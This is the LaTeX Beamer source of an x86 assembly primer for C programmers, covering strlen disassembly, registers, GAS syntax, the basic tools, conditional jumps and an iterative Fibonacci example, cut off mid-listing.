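% NOTE: the following lines are web-page residue from the repository viewer,
% not part of the document; kept as comments so the file compiles.
% Permalink
% Switch branches/tags
% Nothing to show
% Find file Copy path
% Fetching contributors...
% Cannot retrieve contributors at this time
% 3574 lines (3165 sloc) 101 KB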
% Beamer slide deck at 11pt; the xcolor=dvipsnames class option is what makes
% the named color "Brown" (used for the structure color below) available.
\documentclass[11pt,xcolor=dvipsnames]{beamer}
% minted supplies the syntax-highlighted listing environments defined below.
\usepackage{minted}
% NOTE(review): the slides call \includegraphics with key=value options
% (width=..., height=...), which is graphicx syntax. Presumably this works
% because graphicx is already loaded by the class -- confirm, or load graphicx.
\usepackage{graphics}
% Theme: CambridgeUS layout with Brown as the structure (accent) color.
\usecolortheme[named=Brown]{structure}
\usetheme{CambridgeUS}
% Hide the navigation symbols; use ball bullets in the table of contents and
% square bullets for first- and second-level itemize lists.
\setbeamertemplate{navigation symbols}{}
\setbeamertemplate{section in toc}[ball unnumbered]
\setbeamertemplate{itemize item}[square]
\setbeamertemplate{itemize subitem}[square]
% Explicit font sizes, given as size*={<size>}{<baselineskip>}, for the frame
% title and for the section name shown in the headline.
\setbeamerfont{frametitle}{size*={12}{1}}
\setbeamerfont{section in head/foot}{size*={9.5}{1}}
% Narrow left text margin to leave more horizontal room for listings.
\setbeamersize{text margin left = 1em}
% Pygments style used for all minted listings.
\usemintedstyle{perldoc}
% Each \newminted{<lang>}{<opts>} defines a <lang>code environment (and a
% starred <lang>code* variant taking extra options), e.g. gascode, ccode,
% customobjdumpcode, textcode, as used in the frames below.
% NOTE(review): "customobjdump" does not look like a stock Pygments lexer name;
% presumably a custom lexer shipped with this project -- confirm it is installed.
\newminted{gas}{fontsize=\fontsize{9}{8},obeytabs=true}
\newminted{customobjdump}{fontsize=\fontsize{9}{8},obeytabs=true}
\newminted{c}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{nasm}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{bash}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{text}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
% \vs: insert a small (0.5em) vertical gap, e.g. between text and a listing.
\newcommand{\vs}{\vspace{0.5em}}
% \mvs: negative vertical space (-0.95em) that pulls the following content
% upward; used at the top of frames that need extra room.
\newcommand{\mvs}{\vspace{-0.95em}}
% Hook run at the start of a section: emits a divider frame showing the
% section title centered, in \huge size and the theme's structure color.
\AtBeginSection{
\begin{frame}
\begin{center}
\structure{\huge \insertsection}
\end{center}
\end{frame}
}
% Custom footline: one horizontal box split into two half-width color boxes.
%   left  half: short title, centered
%   right half: short date, then "<frame number> / <total frames>", right-aligned
% NOTE(review): no @-named macros are visible in this template, so the
% \makeatletter/\makeatother pair looks unnecessary -- confirm before removing.
\makeatletter
\setbeamertemplate{footline}
{
\leavevmode%
\hbox{%
% Left half: presentation short title.
\begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,center]{title in head/foot}%
\usebeamerfont{title in head/foot}\insertshorttitle
\end{beamercolorbox}%
% Right half: date and frame counter, padded from the right edge by 2ex.
\begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,right]{date in head/foot}%
\usebeamerfont{date in head/foot}\insertshortdate{}\hspace*{2em}
\insertframenumber{} / \inserttotalframenumber\hspace*{2ex}
\end{beamercolorbox}}%
\vskip0pt%
}
\makeatother
% Custom headline: a single full-paper-width color box showing the current
% section heading, left-aligned with a 2ex indent.
% NOTE(review): no @-named macros are visible in this template, so the
% \makeatletter/\makeatother pair looks unnecessary -- confirm before removing.
\makeatletter
\setbeamertemplate{headline}
{
\leavevmode%
\hbox{%
\begin{beamercolorbox}[wd=\paperwidth,ht=5ex,dp=2.5ex,left]{section in head/foot}%
\hspace*{2ex}\usebeamerfont{section in head/foot}\insertsectionhead
\end{beamercolorbox} }%
% Disabled: a second box that would show the current subsection heading.
% \begin{beamercolorbox}[wd=.30\paperwidth,ht=5ex,dp=2.5ex,left]{subsection in head/foot}%
% \usebeamerfont{subsection in head/foot}\hspace*{2ex}\insertsubsectionhead
% \end{beamercolorbox}}%
\vskip0pt%
}
\makeatother
\begin{document}
\title{x86 Assembly Primer for C Programmers}
\author{Ivan Sergeev}
\institute{\url{https://github.com/vsergeev/apfcp} \\ \vs {\ttfamily git clone git://github.com/vsergeev/apfcp.git}}
\date{January 22/24, 2013}
%%% Title Slide
\begin{frame}[plain]
\titlepage
\end{frame}
\section*{Introduction and Example}
%%% Introduction and Example Slide 0
\begin{frame}[fragile,t]
\frametitle{Why Assembly?}
\begin{itemize}
\item Embedded Systems
\item Well-characterized execution time
\item Bootstrapping an OS
\item Compilers
\item Debugging
\item Fancy instructions
\vs \vs
\pause
\item {\bf Sharpened intuition} on computing
\begin{itemize}
\item Gut instinct on implementation and feasibility
\item Justification for liking powers of two
\item Turing completeness is a special cage
\end{itemize}
\end{itemize}
\end{frame}
%%% Introduction and Example Slide 1
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c)}
Reasonable implementation of \verb+strlen()+ in C:\vs
\begin{ccode}
size_t ex_strlen(const char *s) {
size_t i;
for (i = 0; *s != '\0'; i++)
s++;
return i;
}
\end{ccode}
\end{frame}
%%% Introduction and Example Slide 2
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c) Disassembly}
Let's compile and disassemble it.\vs
\begin{customobjdumpcode}
$ gcc -O1 example-strlen.c -o example-strlen
$ objdump -d example-strlen
...
080483b4 <ex_strlen>:
80483b4: 8b 54 24 04 mov 0x4(%esp),%edx
80483b8: b8 00 00 00 00 mov $0x0,%eax
80483bd: 80 3a 00 cmpb $0x0,(%edx)
80483c0: 74 09 je 80483cb <ex_strlen+0x17>
80483c2: 83 c0 01 add $0x1,%eax
80483c5: 80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
80483c9: 75 f7 jne 80483c2 <ex_strlen+0xe>
80483cb: f3 c3 repz ret
...
\end{customobjdumpcode}
\begin{itemize}
\item Output of optimization levels 2 and 3 only differs with added padding bytes for memory alignment.
\end{itemize}
\end{frame}
%% Introduction and Example Slide 3
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c) Disassembly}
Commented disassembly for \verb+ex_strlen()+:\vs
\begin{gascode}
# size_t ex_strlen(const char *s);
ex_strlen:
mov 0x4(%esp),%edx # %edx = argument s
mov $0x0,%eax # %eax = 0
cmpb $0x0,(%edx) # Compare *(%edx) with 0x00
je end # If equal, jump to return
loop:
add $0x1,%eax # %eax += 1
cmpb $0x0,(%edx,%eax,1) # Compare *(%edx + %eax*1), 0x00
jne loop # If not equal, jump to add
end:
repz ret # Return, return value in %eax
\end{gascode}
\end{frame}
%%% Introduction and Example Slide 4
\begin{frame}[fragile,t]
\frametitle{glibc strlen (example-strlen.c)}
glibc's i386 implementation of \verb+strlen()+:\vs
\begin{customobjdumpcode}
$ cat glibc/sysdeps/i386/strlen.c
\end{customobjdumpcode}
\begin{ccode}
...
size_t
strlen (const char *str)
{
int cnt;
asm("cld\n" /* Search forward. */
/* Some old versions of gas need `repne' instead of `repnz'. */
"repnz\n" /* Look for a zero byte. */
"scasb" /* %0, %1, %3 */ :
"=c" (cnt) : "D" (str), "0" (-1), "a" (0));
return -2 - cnt;
}
...
\end{ccode}
\end{frame}
%%% Introduction and Example Slide 5
\begin{frame}[fragile,t]
\frametitle{glibc strlen (example-strlen.c) Disassembly}
Let's compile and disassemble it.\vs
\begin{customobjdumpcode}
$ gcc -O1 example-strlen.c -o example-strlen
$ objdump -d example-strlen
...
080483cd <glibc_strlen>:
80483cd: 57 push %edi
80483ce: b9 ff ff ff ff mov $0xffffffff,%ecx
80483d3: b8 00 00 00 00 mov $0x0,%eax
80483d8: 8b 7c 24 08 mov 0x8(%esp),%edi
80483dc: fc cld
80483dd: f2 ae repnz scas %es:(%edi),%al
80483df: b8 fe ff ff ff mov $0xfffffffe,%eax
80483e4: 29 c8 sub %ecx,%eax
80483e6: 5f pop %edi
80483e7: c3 ret
...
\end{customobjdumpcode}
\end{frame}
%%% Introduction and Example Slide 6
%\begin{frame}[fragile,t]
%\frametitle{glibc strlen (example-strlen.c) disassembly}
%Commented disassembly for glibc's \verb+strlen()+:\vs
%\begin{gascode}
%# size_t strlen(const char *s);
%strlen:
% push %edi # Save %edi
% mov $0xffffffff,%ecx # %ecx = 0xffffffff
% mov $0x0,%eax # %eax = 0
% mov 0x8(%esp),%edi # %edi = argument s
% cld # Clear direction flag
%
% repnz scas %es:(%edi),%al # Repeat scan while *(%edi) != 0x0
%
% mov $0xfffffffe,%eax # %eax = 0xfffffffe
% sub %ecx,%eax # %eax = %eax - %ecx
% pop %edi # Restore %edi
% ret # Return, return value in %eax
%\end{gascode}
%\end{frame}
%%% Introduction and Example Slide 7
\begin{frame}[fragile,t]
\frametitle{Disassembly side-by-side}
A side-by-side comparison of the disassembly:\vspace{-0.8em}
\begin{columns}[T]
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<ex_strlen>:
# Initialization
8b 54 24 04 mov 0x4(%esp),%edx
b8 00 00 00 00 mov $0x0,%eax
80 3a 00 cmpb $0x0,(%edx)
74 09 je 80483cb <ex_strlen+0x17>
# Main loop
83 c0 01 add $0x1,%eax
80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
75 f7 jne 80483c2 <ex_strlen+0xe>
# End
f3 c3 repz ret
\end{customobjdumpcode*}
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<glibc_strlen>:
# Initialization
57 push %edi
b9 ff ff ff ff mov $0xffffffff,%ecx
b8 00 00 00 00 mov $0x0,%eax
8b 7c 24 08 mov 0x8(%esp),%edi
fc cld
# Main loop
f2 ae repnz scas %es:(%edi),%al
# End
b8 fe ff ff ff mov $0xfffffffe,%eax
29 c8 sub %ecx,%eax
5f pop %edi
c3 ret
\end{customobjdumpcode*}
\end{columns}
\end{frame}
%%% Introduction and Example Slide 8
\begin{frame}[fragile,t]
\frametitle{Disassembly side-by-side}
\mvs
A side-by-side comparison of the main loop disassembly:\vspace{-0.8em}
\begin{columns}[T]
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<ex_strlen>:
...
# Main loop
83 c0 01 add $0x1,%eax
80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
75 f7 jne 80483c2 <ex_strlen+0xe>
...
\end{customobjdumpcode*}
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<glibc_strlen>:
...
# Main loop
f2 ae repnz scas %es:(%edi),%al
...
\end{customobjdumpcode*}
\end{columns}
\vs
\begin{itemize}
\item glibc's i386 \verb+strlen()+ ``main loop'' is only 2 bytes!
\begin{itemize}
\item In fact, it's only one instruction: \verb+repnz scas (%edi),%al+.
\end{itemize}
\pause
\item Reasonable strlen's ``main loop'' is three instructions, with a conditional branch \verb+jne 0x80483c2+.
\pause
\item An older example of when hand-assembly utilized processor features for a more efficient implementation
\item glibc's i486 and i586 implementations of {\ttfamily strlen()} are still assembly, but much more complicated, taking into account memory alignment and processor pipeline
\end{itemize}
\end{frame}
% Outline Slide
\section*{Table of Contents}
\begin{frame}{Outline}
\tableofcontents[part=1]
\end{frame}
\begin{frame}{Outline}
\tableofcontents[part=2]
\end{frame}
\part{1}
\section{Topic 1: State, Instructions, Fetch-Decode-Execute}
\begin{frame}[fragile,t]
\frametitle{State and Instructions}
\begin{itemize}
\item State is retained information
\begin{itemize}
\item CPU Registers: small, built-in, referred to by name \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, ...})
\item Memory: large, external, referred to by address \\ ({\ttfamily 0x80000000, ...})
\end{itemize}
\item Instructions affect and/or use state
\begin{itemize}
\item Add a constant to a register, subtract two registers, write to a memory location, jump to a memory location if a flag is set, etc.
\end{itemize}
\vs
\pause
\item Sufficient expressiveness of instructions makes a CPU Turing complete, provided you have infinite memory
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{8086 CPU Registers}
\mvs
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/8086state.png}
\end{figure}
\begin{itemize}
\item Original 8086 was a 16-bit CPU
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{386+ CPU Registers}
\mvs
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
\end{figure}
\begin{itemize}
\item 386+ is a 32-bit CPU, all registers extended to 32-bits
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{386+ CPU Registers and Memory}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386statemem.png}
\end{figure}
\begin{itemize}
\item Registers + Memory comprise (almost) total system state
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instructions}
\begin{itemize}
\item x86 instructions manipulate CPU registers, memory, and I/O ports
\item Encoded as numbers, sitting in memory like any other data
\item Uniquely defined for each architecture in its {\bf instruction set}
\item {\ttfamily \%eip} contains address of next instruction
\vs \vs \vs
\pause
\item Fetch-Decode-Execute Simplified CPU Model
\begin{itemize}
\item CPU {\bf fetches} data at address {\ttfamily \%eip} from main memory \\
\item CPU {\bf decodes} data into an instruction \\
\item CPU {\bf executes} instruction, \\ possibly manipulating memory, I/O, and its own state, including {\ttfamily \%eip}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute0.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute1.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute2.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute3.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute4.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute5.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute6.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute7.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Sampling of Core 386+ User Instructions}
\mvs
\begin{itemize}
\item {\bf Arithmetic:} {\ttfamily adc, add, and, cmp, dec, div, idiv, imul, inc, mul, neg, not, or, rcl, rcr, rol, ror, sal, sar, sbb, shl, shr, sub, test, xor, lea}
\item {\bf Flags:} {\ttfamily clc / stc, cld / std, cli / sti, cmc}
\item {\bf String:} {\ttfamily cmpsb / cmpsw, lodsb / lodsw, movsb / movsw, scasb / scasw, stosb / stosw, repxx}
\item {\bf Stack:} {\ttfamily push, pop}
\item {\bf Memory:} {\ttfamily mov}
\item {\bf Flow Control:} {\ttfamily call, jxx, jmp, ret / retn / retf, loop/loopxx}
\item {\bf Operating System:} {\ttfamily int, into, iret, hlt, pushf, popf, popad, popfd, pushad}
\item {\bf Input/Output:} {\ttfamily in, out}
\item {\bf Misc:} {\ttfamily aaa, aad, aam, aas, daa, cbw, cwd, lahf, lds, les, lock, wait, xchg, xlat, nop}
\end{itemize}
\end{frame}
\section{Topic 2: Arithmetic and Data Transfer}
\begin{frame}[fragile,t]
\frametitle{Instructions in Assembly}
\begin{itemize}
\item Instructions represented by a mnemonic and operands
\item AT\&T/GAS syntax
\begin{itemize}
\item {\bf No operands:} \verb+<mnemonic>+
\begin{itemize}
\item {\ttfamily nop}
\end{itemize}
\item {\bf One operand:} \verb+<mnemonic> <dest>+
\begin{itemize}
\item {\ttfamily incl \%eax}
\end{itemize}
\item {\bf Two operands:} \verb+<mnemonic> <src>,<dest>+
\begin{itemize}
\item {\ttfamily addl \$0x1, \%eax}
\end{itemize}
\end{itemize}
\vs
\pause
\item Source and destination operands are typically one of:
\begin{itemize}
\item {\bf Register:} {\ttfamily \%eax, \%ebx, \%ecx, \%edx,} etc.
\begin{itemize}
\item {\ttfamily movl \%eax, \%ebx}
\end{itemize}
\item {\bf Immediate:} constant value embedded in the instruction encoding
\begin{itemize}
\item {\ttfamily movl \$0x1, \%eax}
\end{itemize}
\item {\bf Memory:} constant value representing an absolute (0x80000000) or relative address (+4)
\begin{itemize}
\item {\ttfamily movl 0x80000000, \%eax}
\end{itemize}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Arithmetic and Data Transfer (example-arith-mov.S)}
\mvs
\begin{gascode}
.section .text
nop # ; (Do nothing!)
# add, sub, adc, and, or, xor
addl %eax, %ebx # %ebx = %ebx + %eax
addl magicNumber, %ebx # %ebx = %ebx + *(magicNumber)
addl %ebx, magicNumber # *(magicNumber) = *(magicNumber) + %ebx
addl $0x12341234, %ebx # %ebx = %ebx + 0x12341234
# inc, dec, not, neg
decl %eax # %eax--
decw %ax # %ax--
decb %al # %al--
# rol, rcl, shl, shr, sal, sar
shrl $3, %eax # %eax = %eax >> 3
shrl $3, magicNumber # *(magicNumber) = *(magicNumber) >> 3
# mov
movl %eax, %ebx # %ebx = %eax
movl magicNumber, %eax # %eax = *(magicNumber)
movl %eax, magicNumber # *(magicNumber) = %eax
.section .data
magicNumber: .long 0xdeadbeef # *magicNumber = 0xdeadbeef;
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Ex. Arithmetic and Data Transfer (example-arith-mov.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-arith-mov.S -o example-arith-mov.o
$ ld example-arith-mov.o -o example-arith-mov
$ objdump -D example-arith-mov
Disassembly of section .text:
08048074 <.text>:
8048074: 90 nop
8048075: 01 c3 add %eax,%ebx
8048077: 03 1d a4 90 04 08 add 0x80490a4,%ebx
804807d: 01 1d a4 90 04 08 add %ebx,0x80490a4
8048083: 81 c3 34 12 34 12 add $0x12341234,%ebx
8048089: 48 dec %eax
804808a: 66 48 dec %ax
804808c: fe c8 dec %al
804808e: c1 e8 03 shr $0x3,%eax
8048091: c1 2d a4 90 04 08 03 shrl $0x3,0x80490a4
8048098: 89 c3 mov %eax,%ebx
804809a: a1 a4 90 04 08 mov 0x80490a4,%eax
804809f: a3 a4 90 04 08 mov %eax,0x80490a4
Disassembly of section .data:
080490a4 <magicNumber>:
80490a4: ef out %eax,(%dx)
80490a5: be .byte 0xbe
80490a6: ad lods %ds:(%esi),%eax
80490a7: de .byte 0xde
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{A Note on GAS Syntax}
\begin{itemize}
\item Syntax
\begin{itemize}
\item {\ttfamily \%} precedes a register: {\ttfamily \%eax}
\item {\ttfamily \$} precedes a constant: {\ttfamily \$5, \$0xff, \$07, \$'A, \$0b111}
\item {\ttfamily .} precedes a directive: {\ttfamily .byte, .long, .ascii, .section, .comm}
\item {\ttfamily \#} precedes a comment
\vs
\pause
\item {\bf No special character precedes a dereferenced memory address:} \\ {\ttfamily movl \%eax, 0x80000000 \;\; \# *(0x80000000) = \%eax}
\pause
\item {\ttfamily mylabel:} defines a label, a symbol of name {\ttfamily mylabel} containing the address at that point
\pause
\end{itemize}
\vs
\item Directives
\begin{itemize}
\item Place a raw byte: {\ttfamily .byte 0xff}
\item Place a raw short: {\ttfamily .short 0x1234}
\item Place a raw ASCII string: {\ttfamily .ascii "Hello World!\textbackslash0"}
\item Specify a section (e.g. .text, .data, .rodata, .bss): \\ {\ttfamily .section <section-name>}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{A Note on GAS Syntax}
\begin{itemize}
\item Instruction Size Suffix
\begin{itemize}
\item x86 is backwards compatible to the original 8086
\item Inherited instructions operate on 8-bits, 16-bits, 32-bits
\item Naturally, they often have the same name...
\vs
\pause
\item GAS supports the syntax {\ttfamily <mnemonic><size>} \\ to unambiguously encode the correct instruction \\
\begin{textcode}
movb $0xff, %al movw %bx, %ax movl memAddr, %eax
incb %ah incw %ax incl %eax
\end{textcode}
\end{itemize}
\end{itemize}
\begin{center}
\begin{tabular}{c|c|c}
\textbf{Name} & \textbf{Size} & \textbf{GAS Suffix} \\
\hline \hline
byte & 8-bits & b \\
word & 16-bits & w \\
dword & 32-bits & l \\
qword & 64-bits & q \\
\end{tabular}
\end{center}
\end{frame}
\section{Basic Tools}
\begin{frame}[fragile,t]
\frametitle{Common Invocations}
\begin{itemize}
\item Assemble: {\ttfamily as prog.asm -o prog.o}
\item Link directly: {\ttfamily ld prog.o -o prog}
\item Link with libc: {\ttfamily gcc prog.o -o prog}
\item Disassemble: {\ttfamily objdump -D prog}
\item View Sections: {\ttfamily objdump -x prog}
\item View Symbols: {\ttfamily nm prog}
\item Debug Disassembly: {\ttfamily gdb prog}
\begin{itemize}
\item Step instruction: {\ttfamily si}
\item Disassembly layout: {\ttfamily layout asm}
\item Set breakpoint at symbol: {\ttfamily b \_start}
\item Set breakpoint at address: {\ttfamily b * 0x80001230}
\item View CPU registers: {\ttfamily info reg}
\item Disassemble next three instructions: {\ttfamily x/3i \$eip}
\item View five dwords of memory starting at {\ttfamily \$esp}: {\ttfamily x/5w \$esp}
\item View five bytes of memory starting at {\ttfamily 0xbffffff0}: {\ttfamily x/5b 0xbffffff0}
\end{itemize}
\end{itemize}
\end{frame}
\section{Topic 3: Flow Control}
\begin{frame}[fragile,t]
\frametitle{Modifying Flow of Execution}
\mvs
\begin{itemize}
\item With most instructions, CPU will increment {\ttfamily \%eip} by the executed instruction size to proceed to the next immediate instruction
\end{itemize}
\begin{gascode}
a_label:
nop
addl $5, %eax # %eax = %eax + 5
xorl %ecx, %ebx # %ebx = %ebx ^ %ecx
another_label:
nop
nop
\end{gascode}
\pause
\begin{itemize}
\item The unconditional {\ttfamily jmp <label>} instruction allows us to explicitly change {\ttfamily \%eip} to another address, and continue execution from there
\end{itemize}
\begin{gascode}
a_label:
nop
addl $5, %eax # %eax = %eax + 5
jmp somewhere_else # Jump to somewhere_else
another_label:
... # We just skipped over all of this
somewhere_else:
xorl %ecx, %ebx # %ebx = %ebx ^ %ecx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Modifying Flow of Execution Conditionally}
\begin{itemize}
\item Certain instructions will set boolean bit flags in the {\ttfamily \%eflags} register based on the result
\begin{itemize}
\item Implicitly, based on result of an arithmetic instruction
\item Explicitly, with {\ttfamily cmp} or {\ttfamily test} between two operands
\end{itemize}
\item Flags are the basis of flow control with conditional jumps, which \\ update {\ttfamily \%eip} to a relative offset if an {\ttfamily \%eflags} flag is set
\end{itemize}
\mvs
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/eflags.png} \\
\vs
\includegraphics[height=0.3\paperheight]{figures/ia32-eflags.png}\let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer's Manual Vol. 1, A-1}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Conditional Jumps}
\mvs
\begin{table}[h]\scriptsize
\begin{tabular}{l|c|c}
\textbf{Instruction} & \textbf{\%eflags Condition} & \textbf{Description} \\
\hline
{\ttfamily jmp <label>} & - & Unconditional Jump \\
\textbf{Unsigned Conditional Jumps} & & \\
\hline
{\ttfamily ja / jnbe <label>} & (CF or ZF) = 0 & Above / Not below or equal \\
{\ttfamily jae / jnb <label>} & CF = 0 & Above or equal / Not below \\
{\ttfamily jb / jnae <label>} & CF = 1 & Below / Not above or equal \\
{\ttfamily jc <label>} & CF = 1 & Carry \\
{\ttfamily je/jz <label>} & ZF = 1 & Equal / Zero \\
{\ttfamily jnc <label>} & CF = 0 & Not Carry \\
{\ttfamily jne/jnz <label>} & ZF = 0 & Not Equal / Not Zero \\
\textbf{Signed Conditional Jumps} & & \\
\hline
{\ttfamily jg / jnle <label>} & ((SF xor OF) or ZF) = 0 & Greater / Not Less or Equal\\
{\ttfamily jge / jnl <label>} & (SF xor OF) = 0 & Greater or Equal / Not Less\\
{\ttfamily jl / jnge <label>} & (SF xor OF) = 1 & Less / Not Greater or Equal \\
{\ttfamily jle / jng <label>} & ((SF xor OF) or ZF) = 1 & Less or Equal / Not Greater \\
{\ttfamily jno <label>} & OF = 0 & Not overflow \\
{\ttfamily jns <label>} & SF = 0 & Not sign (non-negative) \\
{\ttfamily jo <label>} & OF = 1 & Overflow \\
{\ttfamily js <label>} & SF = 1 & Sign (negative) \\
\end{tabular}
\end{table} \let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer's Manual Vol. 1, 7-23}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S)}
\mvs
\begin{gascode}
.section .text
# cmpl %oper1, %oper2
# updates flags based on result of %oper2 - %oper1
cmpl %eax, %ecx
cmpl $0xFF, %eax
# conditional jumps
je label_foo # jump if %oper2 == %oper1
jg label_bar # jump if %oper2 > %oper1
jl label_xyz # jump if %oper2 < %oper1
# test %oper1, %oper2
# updates flags based on result of %oper2 & %oper1
testl %eax, %ecx
testl $0x1F, %eax
# arithmetic
# updates flags based on result
addl %eax, %ebx
incl %eax
decl %ebx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Continued}
\mvs
\begin{gascode}
# labels are just symbols containing an address to make
# it easy to specify addresses
label1:
label2:
movl $0, %eax # %eax = 0
incl %eax # %eax++ ; ZF set to 0!
jz label1 # Jump if ZF = 1 (not taken)
jnz label3 # Jump if ZF = 0 (taken)
decl %eax # I won't be executed
label3:
nop
nop # Execution will fall
label4: # through label4
jmp label1 # Jump back to label1
# Loops
movl $10, %eax
loop:
nop
decl %eax
jnz loop
# Direct Comparison
cmpl $0x05, %eax
je label_foo # Jump to label_foo if %eax == 5
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-cond-jmp.S -o example-cond-jmp.o
$ ld example-cond-jmp.o -o example-cond-jmp
$ objdump -D example-cond-jmp
Disassembly of section .text:
08048054 <_start>:
8048054: 39 c1 cmp %eax,%ecx
8048056: 3d ff 00 00 00 cmp $0xff,%eax
804805b: 74 2c je 8048089 <label_foo>
804805d: 7f 2b jg 804808a <label_bar>
804805f: 7c 2a jl 804808b <label_xyz>
8048061: 85 c1 test %eax,%ecx
8048063: a9 1f 00 00 00 test $0x1f,%eax
8048068: 01 c3 add %eax,%ebx
804806a: 40 inc %eax
804806b: 4b dec %ebx
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
\mvs
\begin{customobjdumpcode}
0804806c <label1>:
804806c: b8 00 00 00 00 mov $0x0,%eax
8048071: 40 inc %eax
8048072: 74 f8 je 804806c <label1>
8048074: 75 01 jne 8048077 <label3>
8048076: 48 dec %eax
08048077 <label3>:
8048077: 90 nop
8048078: 90 nop
08048079 <label4>:
8048079: eb f1 jmp 804806c <label1>
804807b: b8 0a 00 00 00 mov $0xa,%eax
08048080 <loop>:
8048080: 90 nop
8048081: 48 dec %eax
8048082: 75 fc jne 8048080 <loop>
8048084: 83 f8 05 cmp $0x5,%eax
8048087: 74 00 je 8048089 <label_foo>
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: Iterative Fibonacci}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S)}
\mvs
\begin{gascode}
.section .text
.global main
main:
movl $0, %ecx # f_n-2 = 0
movl $1, %ebx # f_n-1 = 1
movl $1, %eax # f_n = 1
movl $12, %edi # Number of integers to compute
fib_loop:
# Print %eax
call myprint
movl %ebx, %ecx # f_n-1 -> f_n-2
movl %eax, %ebx # f_n -> f_n-1
addl %ecx, %eax # New f_n = Old f_n + f_n-2
# Decrement %edi
decl %edi
jnz fib_loop
ret
myprint:
...
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S) Output}
\mvs
\begin{textcode}
$ as fibonacci.S -o fibonacci.o
$ gcc fibonacci.o -o fibonacci # (Easy way to link with libc,
# more on this, later)
$ ./fibonacci
1
2
3
5
8
13
21
34
55
89
144
233
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D fibonacci
Disassembly of section .text:
...
080483e4 <main>:
80483e4: b9 00 00 00 00 mov $0x0,%ecx
80483e9: bb 01 00 00 00 mov $0x1,%ebx
80483ee: b8 01 00 00 00 mov $0x1,%eax
80483f3: bf 0c 00 00 00 mov $0xc,%edi
080483f8 <fib_loop>:
80483f8: e8 0a 00 00 00 call 8048407 <myprint>
